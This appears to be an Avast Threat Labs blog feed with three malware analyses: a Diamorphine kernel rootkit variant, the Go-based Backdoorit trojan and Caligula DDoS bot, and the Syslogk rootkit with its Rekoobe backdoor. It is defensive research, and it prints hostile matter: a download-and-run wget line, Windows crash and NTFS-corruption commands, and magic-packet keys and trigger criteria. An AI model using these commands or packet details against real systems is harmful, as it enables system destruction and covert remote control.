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Today β€” 18 June 2024Avast Threat Labs

New Diamorphine rootkit variant seen undetected in the wild

18 June 2024 at 12:00


Code reuse is very frequent in malware, especially for those parts of the sample that are complex to develop or hard to write with an essentially different alternative code. By tracking both source code and object code, we efficiently detect new malware and track the evolution of existing malware in-the-wild.Β 

Diamorphine is a well-known Linux kernel rootkit that supports different Linux kernel versions (2.6.x, 3.x, 4.x, 5.x and 6.x) and processor architectures (x86, x86_64 and ARM64). Briefly stated, when loaded, the module becomes invisible and hides all the files and folders starting with the magic prefix chosen by the attacker at compilation time. After that, the threat actor can interact with Diamorphine by sending signals allowing the following operations: hide/unhide arbitrary processes, hide/unhide the kernel module, and elevate privileges to become root.Β 

In early March 2024, we found a new Diamorphine variant undetected in-the-wild. After obtaining the sample, I examined the .modinfo section and noticed that it fakes the legitimate x_tables Netfilter module and was compiled for a specific kernel version (Kernel 5.19.17).

By listing the functions with Radare2, we can notice that the sample under analysis consisted of Diamorphine kernel rootkit (i.ex. module_hide, hacked_kill, get_syscall_table_bf, find_task, is_invisible, and module_show). But we can see also additional functions in the module (a, b, c, d, e, f, and setup) indicating that the sample was weaponized with more payloads.Β 

Since Diamorphine is a well-known and open-source Linux kernel rootkit, this blog post is focused on the new features that were implemented:

  • Stop Diamorphine by sending a message to the exposed device: β€―xx_tables.
  • Execute arbitrary operating system commands via magic packets.

Inserting theβ€―kernel rootkit

To insert this Diamorphine variant, we need a Linux operating system with the kernel version 5.19.17. We can find the appropriate Linux distro by using Radare2 too. Based on the compiler, we can see that Ubuntu 22.04 is a good candidate for this.Β 

In fact, I found a person on Internet who used Ubuntu Jammy for this, and the version of the symbols of this specific Diamorphine source code partially matches the version of the symbols of the new Diamorphine variant that we found in VirusTotal (i.ex. module_layout don’t matches the version, but unregister_kprobe matches it).Β 

Therefore, the kernel rootkit can be inserted in an Ubuntu Jammy distro having the appropriate version of the symbols (see the Module.symvers file of the kernel where the Diamorphine variant will be inserted into).

XX_Tables: The device that the rootkit creates for user mode toΒ  kernel mode communication

Impersonating the X_Tables module of Netfiler is a clever idea because, this way, registering Netfilter hooks doesn’t raise suspicions, since interacting with Netfilter is an expected behaviour.Β 

At the init_module function, the rootkit creates a device named xx_tables for communicating user mode space with the kernel mode rootkit.

Following the everything is a file idea, the character device structure initialization function receives the file operations structure exposing the operations implemented and handled by the xx_tables device. The β€œg” function that appears in the file_operations structure is responsible for handling the dev_write operation.

Handling the dev_write operation: The β€œg” function.

We can see that the function reads the commands from user mode space via xx_tables device. The memory is copied from the device using the API _copy_from_user.

For safety reasons, the rootkit checks that the data sent from user mode space is not empty. Such data structure contains two fields: The length of the data, and a pointer to the data itself.

Finally, if the input sent from user mode space is the string β€œexitβ€œ, it calls to the exit_ function of the rootkit which restores the system, frees the resources and unloads the kernel module from memory.

The exit_ function

The exit_ function properly restores the system and unloads the rootkit from the kernel memory. It performs the following actions:

  1. It destroys the device created by the rootkit.
  2. It destroys the struct class that was used for creating the device.
  3. Deletes the cdev (character device) that was created.
  4. Unregisters the chrdev_region.
  5. Unregisters the Netfilter hooks implementing the β€œmagic packetsβ€œ.
  6. Finally, it replaces the pointers with the original functions in the system_calls table.

The magic packets

The new Diamorphine rootkit implements β€œmagic packets” supporting both: IPv4 and IPv6. Since the Protocol Family is set to NFPROTO_INET).

The netfilter_hook_function relies in nested calls to a, b, c, d, e and f, functions for handling the magic packets. The magic packet requirements include containing the values β€œwhitehat” and β€œ2023_mn” encrypted with the XOR key: 0x64.

If the packet fits the requirements the arbitrary command is extracted from it and executed into the infected computer.

The hooks in the syscalls table

This is the original Diamorphine rootkit implementation of the syscalls hooking:

Even if the code is exactly the same in the new Diamorphine variant, it is important to highlight that it is configured to hide the files and folders containing the string: β€œβ€¦β€.


We frequently discover new Linux kernel rootkits implementing magic packets that are undetected in-the-wild (i.ex. Syslogk, AntiUnhide, Chicken, etc.) and will continue collaborating and working together for providing the highest level of protection to our customers.

In this new in-the-wild version of Diamorphine, the threat actors added the device functionality allowing to unload the rootkit kernel module from memory and the magic packets functionality enabling the arbitrary commands execution in the infected system.

How to prevent infection and stay safe online

  • Keep your systems up to date.
  • Be sure that your Internet connection is safe to use (i.ex. Virtual Private Network).
  • Avoid downloading/executing files from untrusted sources.
  • Exercise the Principle of Least Privilege (PoLP). In the case of Linux, please, do not execute actions making use of the root account if it is not strictly necessary.
  • Use a strong cyber safety solution such as Norton, Avast, Avira or AVG to make sure you are protected against these types of malwares.

New Diamorphine variant


IoC repository

The Diamorphine Linux kernel rootkit IoCs, the Yara hunting rule and the VirusTotal query are in ourΒ IoC repository.

The post New Diamorphine rootkit variant seen undetected in the wild appeared first on Avast Threat Labs.

Before yesterdayAvast Threat Labs

Go malware on the rise

13 July 2022 at 13:35


The Go programming language is becoming more and more popular. One of the reasons being that Go programs can be compiled for multiple operating systems and architectures in a single binary self containing all needed dependencies. Based on these properties, and as we expected, we observed an increase in the number of malware and gray tools written in Go programming language in the last months. We are discovering new samples weekly.

For instance, in late April, we discovered two new strains in our internal honeypots, namely Backdoorit and Caligula, both of which were at that time undetected on VT.

Both of these malware strains are multiplatform bots compiled for many different processor architectures and written in the Go programming language.

Analyzing Backdoorit

Backdoorit (version 1.1.51562578125) is a multiplatform RAT written in Go programming language and supporting both Windows and Linux/Unix operating systems. In many places in the code it’s also referred to as backd00rit.

Based on the close inspection of the analyse-full command of Backdoorit, we concluded that the main purpose of this malware is stealing Minecraft related files, Visual Studio and Intellij projects.

But the malware is not limited just to those files. Some commands (upload, basharchive, bashupload and so on) allow it to steal arbitrary files and information, install other malware in the system or run arbitrary commands (run, run-binary, etc.) and take screenshots of the user activity (screenshot, ssfile and so on).

Evidence indicates that the Backdoorit developer is not a native English speaker, further pointing to a possible Russian threat actor. The comments and strings in the code are mostly written in English but often grammatically incorrect. For instance, we found the message: β€œAn confirmation required, run ”. We also discovered some isolated strings written in the Russian language.

In addition to the aforementioned strings we also observed that, amongst others, the VimeWorld files (a Russian project that offers Minecraft servers) are being targeted. This further leads us to believe the Russian origin of the threat actor behind this malware.

After running Backdoorit the RAT retrieves some basic environment information such as the current operating system and the name of the user. It then continuously tries to connect to a C&C server to give the attacker access to a shell.

The malware logs all executed operations and taken steps via a set of backd00r1t_logging_* functions. Those logs can be uploaded to the server of the attacker either by using uploadlogs and uploadlogs-file shell commands or automatically in case a Go panic exception is raised.

In such case backd00r1t_backdoor_handlePanic handles the exception and performs the following actions:

  1. It first sends the logs to the endpoint /api/logs of the C&C server with a JSON request structure as defined in the function: backd00r1t_api_SendLogs.
  2. It closes the connection with the C&C server.
  3. It attempts to reconnect again.

The mentioned handler helps to keep the bot connected and also allows the attacker to remotely follow the execution trace.

Once the connection to C&C succeeds, the attacker gets the context information listed below. The function backd00r1t_backdoor_SocketConnectionHandle is responsible for handling all the commands supported by this RAT and first calls to backd00r1t_backdoor_printMotd for displaying such information:

  • Last connected time
  • The Backdoorit version
  • Process
  • Active connections
  • User name
  • User home
  • User id
  • Login
  • Gid
  • Process path
  • Modules Autostart state

The shell allows the threat actor to remotely execute arbitrary commands. The first command that is likely to be run is the analyse-full command because it generates a report.txt file containing the Desktop, Documents, Downloads, Minecraft and VimeWorld folder file trees and uploads the mentioned report and both Visual Studio and IntelliJ projects folders contents, to Bashupload, a web service allowing to upload files from command line with a storage limitation of 50GB.

As mentioned earlier, if the attacker chooses to do so, he/she will be also able to implant other malware in the system. The threat actor can use the commands: run-binary (a command for downloading and executing a script), shell (a command allowing to spawn the operating system shell and execute arbitrary commands) or other available commands.

The malware also contains a sort of a β€œkill-switch” that can be triggered by the exploit command, but in this case this does not simply remove the malware itself, but has the ability to crash the Windows operating system by exploiting CVE-2021-24098 and also corrupt the NTFS of the hard disk via CVE-2021-28312 on vulnerable systems. This leads to complete loss of file information (including size, time and date stamps, permissions and data content) as well as, of course, removing evidence of the infection.

There are many more commands implemented in the shell that you can check at the corresponding section of the Appendix. As you will notice, the malware incorporates a checkupdates command so we may expect to see new versions of Backdoorit soon.

Analyzing Caligula

Caligula is a new IRC multiplatform malicious bot that allows to perform DDoS attacks.

The malware was written in Go programming language and distributed in ELF files targeting several different processor architectures:

  • Intel 80386 32-bit
  • ARM 32-bit
  • PowerPC 64-bit
  • AMD 64-bit

It currently supports Linux and Windows platforms via WSL and uses the function os_user_Current for determining the underlying operating system.

Caligula is based on the Hellabot open source project, an easily modifiable event based IRC bot with the ability to be updated without losing connection to the server.

Of course, more code reuse was found in the Caligula coming from open source projects (log15, fd, go-shellwords, go-isatty and go-colorable) but the core functionality is based on Hellabot.

All the samples that we hunted in the wild are prepared to connect to the same hardcoded IRC channel by using the following data:

  • Host:
  • Channel: #caligula
  • Username: It is composed of the platform, current user and a pseudo-random number.
    • e.g. [LINUX]kali-11066

As shown in the following screenshot, the bot is prepared for joining the Caligula IRC Net v1.0.0 botnet.

Caligula IRC Net v1.0.0 is a botnet ready for flooding. The bots offers to the attacker the following attacks:

Attack Description
udp udp flood with limited options.
http http flood with no options at all.
syn syn flood.
handshake handshake flood.
tcp tcp flood.

For more information on how Caligula bot source code is organized, check the source code file listing available in the appendix. It can be useful for getting a high level perspective on the malware design, notice that new attack methods can be easily added to it and identify the Caligula malware family.


Due to its native multiplatform support and relative ease of development, the use of Go programming language for malicious purposes is currently growing, especially in malware targeting Unix/Linux operating systems.

Naturally with the growing interest and community around the Go programming language, some of the malicious tools are being open sourced on Github and resued by different threat actors.

In this instance, we were one of the firsts in hunting and detecting Backdoorit and Caligula.


Backdoorit shell commands reference

Command syntax Description
shell This command spawns a shell. For Windows platforms, if available, it executes Powershell. Otherwise it executes the Command prompt. For the rest of the platforms, it spawns a Bash Unix shell.
help Shows the help containing the available commands but also some status information.
toggle-path Enables or disables showing the toggle path.
bell Enables or disables the bell sound.
clear-fallback Clears the screen.
background-logs Asks to the attacker for the buffer size and the maximum buffer size in order to store the logs in background.
backdoor Shows the RAT information: BuiltCodenameVersionReconnect time
clear-code Resets any style property of the font by using the ANSI Escape Codes : \x1B[0J
clear-color Clears the shell coloring.
colors / color Enables or Disables the shell coloring.
un-export [env][fir][key][url] Removes an environment variable.
export Adds an environment variable.
mkdir [path] Creates a folder for the specified path.
exit Exits.
wcd Prints the working directory.
motd Prints the following information: Last connected time. The Backdoorit version. ProcessActiveConnectionsUser nameUser homeUser idLoginGidProcess path The modules Autostart state.
get-asset [asset] Access to an asset (those are identified by string and accessed via GO language mapaccess1_faststr function)
extract-asset [asset] (path) Extracts an asset to the specified path.
safe Allows to disable safe mode
open-file Open file.
open Open url in browser.
list-windows-disks List disks (command available for Windows systems)
cp [target] [dist] Copy file.
rm Removes a file or a folder and all its content.
If the attacker is trying to remove the entire current folder, the agent asks her/him for preventing the human error.
cd Changes the working directory.
ls It shows the modification date, Filename and Size.
cat [file][path] Read file.
checkupdates It asks for the version to the endpoint: /api/version
If there is a new version available for the appropriate operating system, then it downloads it by using wget:
wget -O app –user nnstd –password access && chmod +x app && ((./app) &)
exploit [exploit] […args] Runs an exploit. It currently supports the following exploits: windows/crash/uncIt crashes Windows by accessing the file:
\\.\globalroot\device\condrv\kernelconnectwindows/destroy/i30It corrupts the drive by executing the following command: cd C:\\:$i30:$bitmap
autostart It persists the payload by modifying the following files: .bashrc .profile .zshrc .bash_profile .config/fish/config.fish This command enables the internal flag: backd00r1t_modules_autostart_state
autostart-update Update autostart.
exec [cmd] […args] Executes a command with the specified arguments.
sysinfo {detailed} Shows the following system information:
WorkingDirectory, Command line, User, Terminal
neofetch / screenfetch Shows the following system information: CPU Info: Family, Vendor, PhysicalID. CoresHost InfoUptime, OS, Platform, Platform Family, Platform Version, Host ID, Kernel Arch, Kernel Version,Β Network Interfaces Info: HW Addr, Flags, Index
Screenshot / ssfile / screen It creates a screenshot, and stores it in a PNG file located in one of the following directories. It depends on the platform: Windows: C:\Users\{username}\AppData\Local\Temp Linux: /tmp/ Finally, the screenshot is uploaded and, after that, it removes the file from disk.
archiveapi It creates a file following the format:
tmp-archive-{current_date}.gdfgdgd For Windows platforms: C:\\Users\\{username}\\AppData\\Local\\Temp For Linux platforms: /tmp/ The function removes the previous file in case a file with the same name does exist. Then it sends the file and after that, removes the file
Create-archive [output] [target] Create archive with files from target in output.
Uploadapi [file][path] Automatically uploads the file specified to predefined servers.
uploadlogs-file Uses the /api/upload API endpoint for uploading the file agent.log
uploadlogs It sends the logs to the API endpoint /api/logs in JSON format.
upload [url] [file] Upload file to Server (HTTP).
bashupload [file][path] Automatically upload file to https://bashupload.com/
bashdownload Access the file in https://bashupload.com/ with the parameter: ?download=1
bashupload-parse [file][path] Automatically upload file to https://bashupload.com/ and get direct link
basharchive [target] Create archive and upload it to bashupload.com:
download Downloads a file.
bashdownload [url] Downloads the file by querying the url: https://bashupload.com/
With the parameter: ?download=1
run [url] Download script and run it.
run-binary Download script, and run it. Currently, it only supports Windows platforms. It downloads the run-script.ps1 file to a temporary folder and executes it.
cls Clear screen.
$STOP This command stops Backdoorit.
analyse-full It creates a report report.txt containing:{USERHOME}\source\repos{USERHOME}\IdeaProjectsDesktop file tree Documents file tree Downloads file tree AppData\Roaming\.minecraft file tree AppData\Roaming\.vimeworld file tree. It uploads the files in Visual Studio repos folder and IntelliJ projects folder via backd00r1t_analyze_uploadDirectorybut also a report of the files in the main computer folders via backd00r1t_analyze_uploadFile

Backdoorit bot source code listing

  • H:/backdoorIt//injected/backdoor/BackdoorEnvironment.go
  • H:/backdoorIt//injected/backdoor/BackgroundTasks.go
  • H:/backdoorIt//injected/backdoor/CommandHelpers.go
  • H:/backdoorIt//injected/backdoor/ConnectionHandler.go
  • H:/backdoorIt//injected/files/Assets.go
  • H:/backdoorIt//injected/api/Configuration.go
  • H:/backdoorIt//injected/backdoor/ExecHandlers.go
  • H:/backdoorIt//injected/backdoor/ExecHandlers__linux.go
  • H:/backdoorIt//injected/backdoor/main.go
  • H:/backdoorIt//injected/launcher/main.go

Caligula bot source code listing

  • /root/irc/bot/attack/attack.go
  • /root/irc/bot/attack/methods.go
  • /root/irc/bot/attack/parser.go
  • /root/irc/bot/attack/flags.go
  • /root/irc/bot/network/header.go
  • /root/irc/bot/network/ip.go
  • /root/irc/bot/network/tcp.go
  • /root/irc/bot/routine/timedRoutine.go
  • /root/irc/bot/attack/methods/httpflood.go
  • /root/irc/bot/attack/methods/sshflood.go
  • /root/irc/bot/attack/methods/synflood.go
  • /root/irc/bot/attack/methods/tcpflood.go
  • /root/irc/bot/attack/methods/udpflood.go
  • /root/irc/bot/handle.go
  • /root/irc/bot/singleInstance/singleinstance.go
  • /root/irc/bot.go



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  • edcfdc1aa30a94f6e12ccf3e3d1be656e0ec216c1e852621bc11b1e216b9e001

The complete Backdoorit and Caligula IoCs are in our IoC repository.

The post Go malware on the rise appeared first on Avast Threat Labs.

Linux Threat Hunting: β€˜Syslogk’ a kernel rootkit found under development in the wild


Rootkits are dangerous pieces of malware. Once in place, they are usually really hard to detect. Their code is typically more challenging to write than other malware, so developers resort to code reuse from open source projects. As rootkits are very interesting to analyze, we are always looking out for these kinds of samples in the wild.

Adore-Ng is a relatively old, open-source, well-known kernel rootkit for Linux, which initially targeted kernel 2.x but is currently updated to target kernel 3.x. It enables hiding processes, files, and even the kernel module, making it harder to detect. It also allows authenticated user-mode processes to interact with the rootkit to control it, allowing the attacker to hide many custom malicious artifacts by using a single rootkit.

In early 2022, we were analyzing a rootkit mostly based on Adore-Ng that we found in the wild, apparently under development. After obtaining the sample, we examined the .modinfo section and noticed it is compiled for a specific kernel version.

As you may know, even if it is possible to β€˜force load’ the module into the kernel by using the --force flag of the insmod Linux command, this operation can fail if the required symbols are not found in the kernel; this can often lead to a system crash.

insmod -f {module}

We discovered that the kernel module could be successfully loaded without forcing into a default Centos 6.10 distribution, as the rootkit we found is compiled for a similar kernel version.

While looking at the file’s strings, we quickly identified the PgSD93ql hardcoded file name in the kernel rootkit to reference the payload. This payload file name is likely used to make it less obvious for the sysadmin, for instance, it can look like a legitimate PostgreSQL file.

Using this hardcoded file name, we extracted the file hidden by the rootkit. It is a compiled backdoor trojan written in C programming language; Avast’s antivirus engine detects and classifies this file as ELF:Rekoob – which is widely known as the Rekoobe malware family. Rekoobe is a piece of code implanted in legitimate servers. In this case it is embedded in a fake SMTP server, which spawns a shell when it receives a specially crafted command. In this post, we refer to this rootkit as Syslogk rootkit, due to how it β€˜reveals’ itself when specially crafted data is written to the file /proc/syslogk .

Analyzing the Syslogk rootkit

The Syslogk rootkit is heavily based on Adore-Ng but incorporates new functionalities making the user-mode application and the kernel rootkit hard to detect.

Loading the kernel module

To load the rootkit into kernel space, it is necessary to approximately match the kernel version used for compiling; it does not have to be strictly the same.

vermagic=2.6.32-696.23.1.el6.x86_64 SMP mod_unload modversions

For example, we were able to load the rootkit without any effort in a Centos 6.10 virtual machine by using the insmod Linux command.

After loading it, you will notice that the malicious driver does not appear in the list of loaded kernel modules when using the lsmod command.

Revealing the rootkit

The rootkit has a hide_module function which uses the list_del function of the kernel API to remove the module from the linked list of kernel modules. Next, it also accordingly updates its internal module_hidden flag.

Fortunately, the rootkit has a functionality implemented in the proc_write function that exposes an interface in the /proc file system which reveals the rootkit when the value 1 is written into the file /proc/syslogk.

Once the rootkit is revealed, it is possible to remove it from memory using the rmmod Linux command. The Files section of this post has additional details that will be useful for programmatically uncloaking the rootkit.

Overview of the Syslogk rootkit features

Apart from hiding itself, making itself harder to detect when implanted, Syslogk can completely hide the malicious payload by taking the following actions:

  • The hk_proc_readdir function of the rootkit hides directories containing malicious files, effectively hiding them from the operating system.
  • The malicious processes are hidden via hk_getpr – a mix of Adore-Ng functions for hiding processes.
  • The malicious payload is hidden from tools like Netstat; when running, it will not appear in the list of services. For this purpose, the rootkit uses the function hk_t4_seq_show.
  • The malicious payload is not continuously running. The attacker remotely executes it on demand when a specially crafted TCP packet (details below) is sent to the infected machine, which inspects the traffic by installing a netfilter hook.
  • It is also possible for the attacker to remotely stop the payload. This requires using a hardcoded key in the rootkit and knowledge of some fields of the magic packet used for remotely starting the payload.Β 

We observed that the Syslogk rootkit (and Rekoobe payload) perfectly align when used covertly in conjunction with a fake SMTP server. Consider how stealthy this could be; a backdoor that does not load until some magic packets are sent to the machine. When queried, it appears to be a legitimate service hidden in memory, hidden on disk, remotely β€˜magically’ executed, hidden on the network. Even if it is found during a network port scan, it still seems to be a legitimate SMTP server.

For compromising the operating system and placing the mentioned hiding functions, Syslogk uses the already known set_addr_rw and set_addr_ro rootkit functions, which adds or removes writing permissions to the Page Table Entry (PTE) structure.

After adding writing permissions to the PTE, the rootkit can hook the functions declared in the hks internal rootkit structure.

PTE Hooks
Type of the function Offset Name of the function
Original hks+(0x38) * 0 proc_root_readdir
Hook hks+(0x38) * 0 + 0x10 hk_proc_readdir
Original hks+(0x38) * 1 tcp4_seq_show
Hook hks+(0x38) * 1 + 0x10 hk_t4_seq_show
Original hks+(0x38) * 2 sys_getpriority
Hook hks+(0x38) * 2 + 0x10 hk_getpr

The mechanism for placing the hooks consists of identifying the hookable kernel symbols via /proc/kallsyms as implemented in the get_symbol_address function of the rootkit (code reused from this repository). After getting the address of the symbol, the Syslogk rootkit uses the udis86 project for hooking the function.

Understanding the directory hiding mechanism

The Virtual File System (VFS) is an abstraction layer that allows for FS-like operation over something that is typically not a traditional FS. As it is the entry point for all the File System queries, it is a good candidate for the rootkits to hook.

It is not surprising that the Syslogk rootkit hooks the VFS functions for hiding the Rekoobe payload stored in the file /etc/rc-Zobk0jpi/PgSD93ql .

The hook is done by hk_root_readdir which calls to nw_root_filldir where the directory filtering takes place.

As you can see, any directory containing the substring -Zobk0jpi will be hidden.

The function hk_get_vfs opens the root of the file system by using filp_open. This kernel function returns a pointer to the structure file, which contains a file_operations structure called f_op that finally stores the readdir function hooked via hk_root_readdir.

Of course, this feature is not new at all. You can check the source code of Adore-Ng and see how it is implemented on your own.

Understanding the process hiding mechanism

In the following screenshot, you can see that the Syslogk rootkit (code at the right margin of the screenshot) is prepared for hiding a process called PgSD93ql. Therefore, the rootkit seems more straightforward than the original version (see Adore-Ng at the left margin of the screenshot). Furthermore, the process to hide can be selected after authenticating with the rootkit.

The Syslogk rootkit function hk_getpr explained above, is a mix of adore_find_task and should_be_hidden functions but it uses the same mechanism for hiding processes.

Understanding the network traffic hiding mechanism

The Adore-Ng rootkit allows hiding a given set of listening services from Linux programs like Netstat. It uses the exported proc_net structure to change the tcp4_seq_show( ) handler, which is invoked by the kernel when Netstat queries for listening connections. Within the adore_tcp4_seq_show() function, strnstr( ) is used to look in seq->buf for a substring that contains the hexadecimal representation of the port it is trying to hide. If this is found, the string is deleted.

In this way, the backdoor will not appear when listing the connections in an infected machine. The following section describes other interesting capabilities of this rootkit.

Understanding the magic packets

Instead of continuously running the payload, it is remotely started or stopped on demand by sending specially crafted network traffic packets.

These are known as magic packets because they have a special format and special powers. In this implementation, an attacker can trigger actions without having a listening port in the infected machine such that the commands are, in some way, β€˜magically’ executed in the system.

Starting the Rekoobe payload

The magic packet inspected by the Syslogk rootkit for starting the Rekoobe fake SMTP server is straightforward. First, it checks whether the packet is a TCP packet and, in that case, it also checks the source port, which is expected to be 59318.

Rekobee will be executed by the rootkit if the magic packet fits the mentioned criteria.

Of course, before executing the fake service, the rootkit terminates all existing instances of the program by calling the rootkit function pkill_clone_0. This function contains the hardcoded process name PgSD93ql;Β  it only kills the Rekoobe process by sending the KILL signal via send_sig.

To execute the command that starts the Rekoobe fake service in user mode, the rootkit executes the following command by combining the kernel APIs: call_usermodehelper_setup, call_usermodehelper_setfns, and call_usermodehelper_exec.

/bin/sh -c /etc/rc-Zobk0jpi/PgSD93ql

The Files section of this post demonstrates how to manually craft (using Python) the TCP magic packet for starting the Rekoobe payload.

In the next section we describe a more complex form of the magic packet.

Stopping the Rekoobe payload

Since the attacker doesn’t want any other person in the network to be able to kill Rekoobe, the magic packet for killing Rekoobe must match some fields in the previous magic packet used for starting Rekoobe. Additionally, the packet must satisfy additional requirements – it must contain a key that is hardcoded in the rootkit and located in a variable offset of the magic packet. The conditions that are checked:

  1. It checks a flag enabled when the rootkit executes Rekoobe via magic packets. It will only continue if the flag is enabled.
  2. It checks the Reserved field of the TCP header to see that it is 0x08.
  3. The Source Port must be between 63400 and 63411 inclusive.
  4. Both the Destination Port and the Source Address, must to be the same that were used when sending the magic packet for starting Rekoobe.
  5. Finally, it looks for the hardcoded key. In this case, it is: D9sd87JMaij

The offset of the hardcoded key is also set in the packet and not in a hardcoded offset; it is calculated instead. To be more precise, it is set in the data offset byte (TCP header) such that after shifting the byte 4 bits to the right and multiplying it by 4, it points to the offset of where the Key is expected to be (as shown in the following screenshot, notice that the rootkit compares the Key in reverse order).

In our experiments, we used the value 0x50 for the data offset (TCP header) because after shifting it 4 bits, you get 5 which multiplied by 4 is equal to 20. Since 20 is precisely the size of the TCP Header, by using this value, we were able to put the key at the start of the data section of the packet.

If you are curious about how we implemented this magic packet from scratch, then please see the Files section of this blog post.

Analyzing Rekoobe

When the infected machine receives the appropriate magic packet, the rootkit starts the hidden Rekoobe malware in user mode space.

It looks like an innocent SMTP server, but there is a backdoor command on it that can be executed when handling the starttls command. In a legitimate service, this command is sent by the client to the server to advise that it wants to start TLS negotiation.

For triggering the Rekoobe backdoor command (spawning a shell), the attacker must send the byte 0x03 via TLS, followed by a Tag Length Value (TLV) encoded data. Here, the tag is the symbol %, the length is specified in four numeric characters, and the value (notice that the length and value are arbitrary but can not be zero).

Additionally, to establish the TLS connection, you will need the certificate embedded in Rekoobe.

See the Files section below for the certificate and a Python script we developed to connect with Rekoobe.

The origin of Rekoobe payload and Syslogk rootkit

Rekoobe is clearly based on the TinySHell open source project; this is based on ordering observed in character and variables assignment taking place in the same order multiple times.

On the other hand, if you take a look at the Syslogk rootkit, even if it is new, you will notice that there are also references to TinySHell dating back to December 13, 2018.

The evidence suggests that the threat actor developed Rekoobe and Syslogk to run themΒ  together. We are pleased to say that our users are protected and hope that this research assists others.


One of the architectural advantages of security software is that it usually has components running in different privilege levels; malware running on less-privileged levels cannot easily interfere with processes running on higher privilege levels, thus allowing more straightforward dealing with malware.

On the other hand, kernel rootkits can be hard to detect and remove because these pieces of malware run in a privileged layer. This is why it is essential for system administrators and security companies to be aware of this kind of malware and write protections for their users as soon as possible.


Syslogk sample

  • 68facac60ee0ade1aa8f8f2024787244c2584a1a03d10cda83eeaf1258b371f2

Rekoobe sample

  • 11edf80f2918da818f3862246206b569d5dcebdc2a7ed791663ca3254ede772d

Other Rekoobe samples

  • fa94282e34901eba45720c4f89a0c820d32840ae49e53de8e75b2d6e78326074
  • fd92e34675e5b0b8bfbc6b1f3a00a7652e67a162f1ea612f6e86cca846df76c5
  • 12c1b1e48effe60eef7486b3ae3e458da403cd04c88c88fab7fca84d849ee3f5
  • 06778bddd457aafbc93d384f96ead3eb8476dc1bc8a6fbd0cd7a4d3337ddce1e
  • f1a592208723a66fa51ce1bc35cbd6864e24011c6dc3bcd056346428e4e1c55d
  • 55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b
  • df90558a84cfcf80639f32b31aec187b813df556e3c155a05af91dedfd2d7429
  • 160cfb90b81f369f5ba929aba0b3130cb38d3c90d629fe91b31fdef176752421
  • b4d0f0d652f907e4e77a9453dcce7810b75e1dc5867deb69bea1e4ecdd02d877
  • 3a6f339df95e138a436a4feff64df312975a262fa16b75117521b7d6e7115d65
  • 74699b0964a2cbdc2bc2d9ca0b2b6f5828b638de7c73b1d41e7fe26cfc2f3441
  • 7a599ff4a58cb0672a1b5e912a57fcdc4b0e2445ec9bc653f7f3e7a7d1dc627f
  • f4e3cfeeb4e10f61049a88527321af8c77d95349caf616e86d7ff4f5ba203e5f
  • 31330c0409337592e9de7ac981cecb7f37ce0235f96e459fefbd585e35c11a1a
  • c6d735b7a4656a52f3cd1d24265e4f2a91652f1a775877129b322114c9547deb
  • 2e81517ee4172c43a2084be1d584841704b3f602cafc2365de3bcb3d899e4fb8
  • b22f55e476209adb43929077be83481ebda7e804d117d77266b186665e4b1845
  • a93b9333a203e7eed197d0603e78413013bd5d8132109bbef5ef93b36b83957c
  • 870d6c202fcc72088ff5d8e71cc0990777a7621851df10ba74d0e07d19174887
  • ca2ee3f30e1c997cc9d8e8f13ec94134cdb378c4eb03232f5ed1df74c0a0a1f0
  • 9d2e25ec0208a55fba97ac70b23d3d3753e9b906b4546d1b14d8c92f8d8eb03d
  • 29058d4cee84565335eafdf2d4a239afc0a73f1b89d3c2149346a4c6f10f3962
  • 7e0b340815351dab035b28b16ca66a2c1c7eaf22edf9ead73d2276fe7d92bab4
  • af9a19f99e0dcd82a31e0c8fc68e89d104ef2039b7288a203f6d2e4f63ae4d5c
  • 6f27de574ad79eb24d93beb00e29496d8cfe22529fc8ee5010a820f3865336a9
  • d690d471b513c5d40caef9f1e37c94db20e6492b34ea6a3cddcc22058f842cf3
  • e08e241d6823efedf81d141cc8fd5587e13df08aeda9e1793f754871521da226
  • da641f86f81f6333f2730795de93ad2a25ab279a527b8b9e9122b934a730ab08
  • e3d64a128e9267640f8fc3e6ba5399f75f6f0aca6a8db48bf989fe67a7ee1a71
  • d3e2e002574fb810ac5e456f122c30f232c5899534019d28e0e6822e426ed9d3
  • 7b88fa41d6a03aeda120627d3363b739a30fe00008ce8d848c2cbb5b4473d8bc
  • 50b73742726b0b7e00856e288e758412c74371ea2f0eaf75b957d73dfb396fd7
  • 8b036e5e96ab980df3dca44390d6f447d4ca662a7eddac9f52d172efff4c58f8
  • 8b18c1336770fcddc6fe78d9220386bce565f98cc8ada5a90ce69ce3ddf36043
  • f04dc3c62b305cdb4d83d8df2caa2d37feeb0a86fb5a745df416bac62a3b9731
  • 72f200e3444bb4e81e58112111482e8175610dc45c6e0c6dcd1d2251bacf7897
  • d129481955f24430247d6cc4af975e4571b5af7c16e36814371575be07e72299
  • 6fc03c92dee363dd88e50e89062dd8a22fe88998aff7de723594ec916c348d0a
  • fca2ea3e471a0d612ce50abc8738085f076ad022f70f78c3f8c83d1b2ff7896b
  • 2fea3bc88c8142fa299a4ad9169f8879fc76726c71e4b3e06a04d568086d3470
  • 178b23e7eded2a671fa396dd0bac5d790bca77ec4b2cf4b464d76509ed12c51a
  • 3bff2c5bfc24fc99d925126ec6beb95d395a85bc736a395aaf4719c301cbbfd4
  • 14a33415e95d104cf5cf1acaff9586f78f7ec3ffb26efd0683c468edeaf98fd7
  • 8bb7842991afe86b97def19f226cb7e0a9f9527a75981f5e24a70444a7299809
  • 020a6b7edcff7764f2aac1860142775edef1bc057bedd49b575477105267fc67
  • 6711d5d42b54e2d261bb48aa7997fa9191aec059fd081c6f6e496d8db17a372a
  • 48671bc6dbc786940ede3a83cc18c2d124d595a47fb20bc40d47ec9d5e8b85dc
  • b0d69e260a44054999baa348748cf4b2d1eaab3dd3385bb6ad5931ff47a920de
  • e1999a3e5a611312e16bb65bb5a880dfedbab8d4d2c0a5d3ed1ed926a3f63e94
  • fa0ea232ab160a652fcbd8d6db8ffa09fd64bcb3228f000434d6a8e340aaf4cb
  • 11edf80f2918da818f3862246206b569d5dcebdc2a7ed791663ca3254ede772d
  • 73bbabc65f884f89653a156e432788b5541a169036d364c2d769f6053960351f
  • 8ec87dee13de3281d55f7d1d3b48115a0f5e4a41bfbef1ea08e496ac529829c8
  • 8285ee3115e8c71c24ca3bdce313d3cfadead283c31a116180d4c2611efb610d
  • 958bce41371b68706feae0f929a18fa84d4a8a199262c2110a7c1c12d2b1dce2
  • 38f357c32f2c5a5e56ea40592e339bac3b0cabd6a903072b9d35093a2ed1cb75
  • bcc3d47940ae280c63b229d21c50d25128b2a15ea42fe8572026f88f32ed0628
